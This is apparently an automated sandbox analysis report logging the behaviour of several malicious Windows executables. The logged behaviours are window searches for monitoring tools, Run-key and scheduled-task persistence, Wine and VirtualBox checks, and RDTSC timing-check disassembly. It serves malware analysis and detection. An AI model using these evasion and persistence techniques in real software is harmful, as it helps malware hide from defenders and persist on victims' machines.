Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exe | File created: C:\Windows\Tasks\skotes.job
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9673a0a47c.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9673a0a47c.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd

                            Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\AApUa7VQiy.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\AApUa7VQiy.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\AApUa7VQiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1061683001\infinity.exe	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmp	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\Desktop\AApUa7VQiy.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\AApUa7VQiy.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\AApUa7VQiy.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\AApUa7VQiy.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: regsvr32.exe, 00000024.00000002.2747028039.000000000132B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: X64DBG.EXE
Source: regsvr32.exe, 00000024.00000002.2747028039.000000000132B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OLLYDBG.EXEZ
Source: C:\Users\user\Desktop\AApUa7VQiy.exe	RDTSC instruction interceptor: First address: EFF024 second address: EFF02E instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF30D194DB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AApUa7VQiy.exe	RDTSC instruction interceptor: First address: EFF02E second address: EFE89F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007FF30CF3CAF9h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 mov dword ptr [ebp+122D2191h], ecx 0x00000016 cmc 0x00000017 push dword ptr [ebp+122D1589h] 0x0000001d add dword ptr [ebp+122D1AEAh], edi 0x00000023 call dword ptr [ebp+122D1A53h] 0x00000029 pushad 0x0000002a jbe 00007FF30CF3CAE7h 0x00000030 jmp 00007FF30CF3CAF9h 0x00000035 xor eax, eax 0x00000037 mov dword ptr [ebp+122D35B4h], ecx 0x0000003d mov edx, dword ptr [esp+28h] 0x00000041 cld 0x00000042 mov dword ptr [ebp+122D291Bh], eax 0x00000048 clc 0x00000049 mov esi, 0000003Ch 0x0000004e pushad 0x0000004f pushad 0x00000050 or ch, 00000061h 0x00000053 mov dl, 3Ch 0x00000055 popad 0x00000056 mov al, cl 0x00000058 popad 0x00000059 add esi, dword ptr [esp+24h] 0x0000005d sub dword ptr [ebp+122D1B63h], edi 0x00000063 lodsw 0x00000065 jo 00007FF30CF3CAF2h 0x0000006b jns 00007FF30CF3CAECh 0x00000071 add eax, dword ptr [esp+24h] 0x00000075 jng 00007FF30CF3CAF5h 0x0000007b jmp 00007FF30CF3CAEFh 0x00000080 mov ebx, dword ptr [esp+24h] 0x00000084 jmp 00007FF30CF3CAEAh 0x00000089 nop 0x0000008a push eax 0x0000008b push edx 0x0000008c push eax 0x0000008d push edx 0x0000008e push eax 0x0000008f pop eax 0x00000090 rdtsc
Source: C:\Users\user\Desktop\AApUa7VQiy.exe	RDTSC instruction interceptor: First address: EFE89F second address: EFE8B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DBEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AApUa7VQiy.exe	RDTSC instruction interceptor: First address: EFE8B1 second address: EFE8D1 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF30CF3CAF6h 0x00000008 jmp 00007FF30CF3CAF0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\AApUa7VQiy.exe	RDTSC instruction interceptor: First address: EFE8D1 second address: EFE8D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\AApUa7VQiy.exe	RDTSC instruction interceptor: First address: 1075365 second address: 107536B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AApUa7VQiy.exe	RDTSC instruction interceptor: First address: 107536B second address: 107536F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AApUa7VQiy.exe	RDTSC instruction interceptor: First address: 107536F second address: 1075375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AApUa7VQiy.exe	RDTSC instruction interceptor: First address: 1075375 second address: 1075389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007FF30D194DBAh 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1075389 second address: 107539C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF30CF3CAEDh 0x0000000b rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 107539C second address: 10753A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 105A3A1 second address: 105A3B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FF30CF3CAE6h 0x0000000a jbe 00007FF30CF3CAE6h 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10745BF second address: 10745C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10748BF second address: 10748D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF30CF3CAE6h 0x0000000a jmp 00007FF30CF3CAEBh 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 107728E second address: 10772C4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a push edi 0x0000000b mov edi, dword ptr [ebp+122D2C1Fh] 0x00000011 pop ecx 0x00000012 push 00000000h 0x00000014 mov cx, BDACh 0x00000018 push 673CDA36h 0x0000001d push eax 0x0000001e push edx 0x0000001f js 00007FF30D194DC7h 0x00000025 jmp 00007FF30D194DC1h 0x0000002a rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10772C4 second address: 107733C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30CF3CAF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 673CDAB6h 0x00000010 or esi, 24E36553h 0x00000016 mov ecx, dword ptr [ebp+122D2A27h] 0x0000001c push 00000003h 0x0000001e call 00007FF30CF3CAF8h 0x00000023 jmp 00007FF30CF3CAF1h 0x00000028 pop edx 0x00000029 push 00000000h 0x0000002b mov si, F0F5h 0x0000002f push 00000003h 0x00000031 movsx edx, si 0x00000034 call 00007FF30CF3CAE9h 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d js 00007FF30CF3CAE6h 0x00000043 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 107733C second address: 1077346 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF30D194DB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1077346 second address: 107734B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1077495 second address: 1077499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1077499 second address: 10774BA instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF30CF3CAE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF30CF3CAF5h 0x00000011 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10774BA second address: 107754A instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF30D194DB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D3758h], ebx 0x00000012 push 00000000h 0x00000014 jng 00007FF30D194DC6h 0x0000001a call 00007FF30D194DB9h 0x0000001f push eax 0x00000020 jmp 00007FF30D194DC5h 0x00000025 pop eax 0x00000026 push eax 0x00000027 jnc 00007FF30D194DC3h 0x0000002d mov eax, dword ptr [esp+04h] 0x00000031 jmp 00007FF30D194DBDh 0x00000036 mov eax, dword ptr [eax] 0x00000038 jng 00007FF30D194DC7h 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 pushad 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 107754A second address: 10775B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 je 00007FF30CF3CAE6h 0x0000000e jno 00007FF30CF3CAE6h 0x00000014 popad 0x00000015 popad 0x00000016 pop eax 0x00000017 jc 00007FF30CF3CAECh 0x0000001d mov edx, dword ptr [ebp+122D2993h] 0x00000023 push 00000003h 0x00000025 mov edi, dword ptr [ebp+122D219Ch] 0x0000002b mov di, si 0x0000002e push 00000000h 0x00000030 mov ch, 33h 0x00000032 push 00000003h 0x00000034 mov dx, bx 0x00000037 push D9051FFDh 0x0000003c jmp 00007FF30CF3CAEAh 0x00000041 xor dword ptr [esp], 19051FFDh 0x00000048 jmp 00007FF30CF3CAF1h 0x0000004d lea ebx, dword ptr [ebp+1244C1A4h] 0x00000053 mov di, ax 0x00000056 xchg eax, ebx 0x00000057 push ebx 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1077699 second address: 107769E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 107769E second address: 10776CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF30CF3CAF2h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF30CF3CAF0h 0x00000017 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10995E6 second address: 1099638 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF30D194DC7h 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FF30D194DC5h 0x00000016 pop eax 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b jne 00007FF30D194DB6h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1099638 second address: 109963C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 109963C second address: 1099640 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1099640 second address: 1099649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1099649 second address: 1099659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF30D194DB6h 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1099659 second address: 109965F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 109965F second address: 1099683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF30D194DB6h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FF30D194DC6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 109764E second address: 1097652 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1097652 second address: 1097672 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007FF30D194DC2h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1097672 second address: 1097678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1097678 second address: 10976A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF30D194DCFh 0x0000000a popad 0x0000000b jg 00007FF30D194DC4h 0x00000011 pushad 0x00000012 push esi 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10977EA second address: 1097806 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30CF3CAF7h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1097806 second address: 109780C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1097979 second address: 109797F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 109797F second address: 1097985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1097DBA second address: 1097DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1098207 second address: 109820C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 109820C second address: 1098212 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1098497 second address: 10984B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF30D194DC8h 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10984B3 second address: 10984CA instructions: 0x00000000 rdtsc 0x00000002 js 00007FF30CF3CAE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b jng 00007FF30CF3CB1Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10984CA second address: 10984CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 109865D second address: 1098663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1098663 second address: 109867D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF30D194DB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF30D194DBEh 0x00000011 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 109867D second address: 1098681 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1098681 second address: 10986A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a jmp 00007FF30D194DC2h 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop ebx 0x00000012 jl 00007FF30D194DBCh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1098EAF second address: 1098EBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30CF3CAECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1098EBF second address: 1098ED1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF30D194DB8h 0x00000008 js 00007FF30D194DBEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 109941C second address: 1099420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1099420 second address: 109943B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF30D194DC2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 109943B second address: 1099446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF30CF3CAE6h 0x0000000a popad 0x0000000b rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 109C1DB second address: 109C1EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF30D194DBCh 0x00000009 rdtsc
